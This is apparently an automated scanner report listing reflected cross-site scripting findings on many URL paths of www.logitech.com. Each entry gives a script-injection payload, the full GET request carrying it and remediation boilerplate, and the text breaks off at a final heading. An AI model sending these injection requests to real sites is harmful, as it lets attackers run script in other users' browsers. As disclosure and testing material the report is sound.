HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92a8e"><script>alert(1)</script>a5a1b05f9a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloads92a8e"><script>alert(1)</script>a5a1b05f9a8/downloads/speakers-audio HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26e58</script><script>alert(1)</script>d5709b1f84d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads26e58</script><script>alert(1)</script>d5709b1f84d/downloads/speakers-audio HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49e28</script><script>alert(1)</script>bf0e8998a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads/downloads49e28</script><script>alert(1)</script>bf0e8998a9/speakers-audio HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f926"><script>alert(1)</script>421b54e227a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloads/downloads5f926"><script>alert(1)</script>421b54e227a/speakers-audio HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e82ca"><script>alert(1)</script>71e69ce363b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloads/downloads/speakers-audioe82ca"><script>alert(1)</script>71e69ce363b HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c733e</script><script>alert(1)</script>fe6edf122b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads/downloads/speakers-audioc733e</script><script>alert(1)</script>fe6edf122b1 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:41:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 479ee</script><script>alert(1)</script>40dbc32a61a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /479ee</script><script>alert(1)</script>40dbc32a61a/support-downloads/support-contactus HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce4fc"><script>alert(1)</script>c04d43d968 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-usce4fc"><script>alert(1)</script>c04d43d968/support-downloads/support-contactus HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c983</script><script>alert(1)</script>9dfba4d2a80 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads1c983</script><script>alert(1)</script>9dfba4d2a80/support-contactus HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87a10"><script>alert(1)</script>5ead612afa7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloads87a10"><script>alert(1)</script>5ead612afa7/support-contactus HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 494bc</script><script>alert(1)</script>6838b8c29 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/support-downloads/support-contactus494bc</script><script>alert(1)</script>6838b8c29 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be3d3"><script>alert(1)</script>67973059ee8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/support-downloads/support-contactusbe3d3"><script>alert(1)</script>67973059ee8 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46e26</script><script>alert(1)</script>0557b058fa5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /46e26</script><script>alert(1)</script>0557b058fa5/utilities/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6ab1"><script>alert(1)</script>4d3c6a00e78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-usd6ab1"><script>alert(1)</script>4d3c6a00e78/utilities/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9b64</script><script>alert(1)</script>f4fee06add9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/utilitiese9b64</script><script>alert(1)</script>f4fee06add9/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b93fe"><script>alert(1)</script>0c833f57a07 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-us/utilitiesb93fe"><script>alert(1)</script>0c833f57a07/ HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response (redirected)
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 13:01:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9d5b</script><script>alert(1)</script>4efe70ff226 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /e9d5b</script><script>alert(1)</script>4efe70ff226/utilities/sitemap HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e89b5"><script>alert(1)</script>e3b18437d59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-use89b5"><script>alert(1)</script>e3b18437d59/utilities/sitemap HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4fcf"><script>alert(1)</script>844e857328 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/utilitiesd4fcf"><script>alert(1)</script>844e857328/sitemap HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d232e</script><script>alert(1)</script>90579ffbd62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/utilitiesd232e</script><script>alert(1)</script>90579ffbd62/sitemap HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e934f"><script>alert(1)</script>b8c7fd568ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/utilities/sitemape934f"><script>alert(1)</script>b8c7fd568ae HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fce71</script><script>alert(1)</script>7b37907e59d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/utilities/sitemapfce71</script><script>alert(1)</script>7b37907e59d HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d657</script><script>alert(1)</script>647c4e9bb9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /3d657</script><script>alert(1)</script>647c4e9bb9f/video-security-systems HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b51e"><script>alert(1)</script>2ba1e29b0ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us7b51e"><script>alert(1)</script>2ba1e29b0ce/video-security-systems HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7edf0"%3bf6b1c42b807 was submitted in the REST URL parameter 1. This input was echoed as 7edf0";f6b1c42b807 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us7edf0"%3bf6b1c42b807/video-security-systems HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7641</script><script>alert(1)</script>68c6d4cc006 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /en-us/video-security-systemsa7641</script><script>alert(1)</script>68c6d4cc006 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cea3"><script>alert(1)</script>762733703e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en-us/video-security-systems6cea3"><script>alert(1)</script>762733703e0 HTTP/1.1 Host: www.logitech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Apache Date: Fri, 12 Nov 2010 12:52:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2edec"%3b023c0efe40d was submitted in the REST URL parameter 1. This input was echoed as 2edec";023c0efe40d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
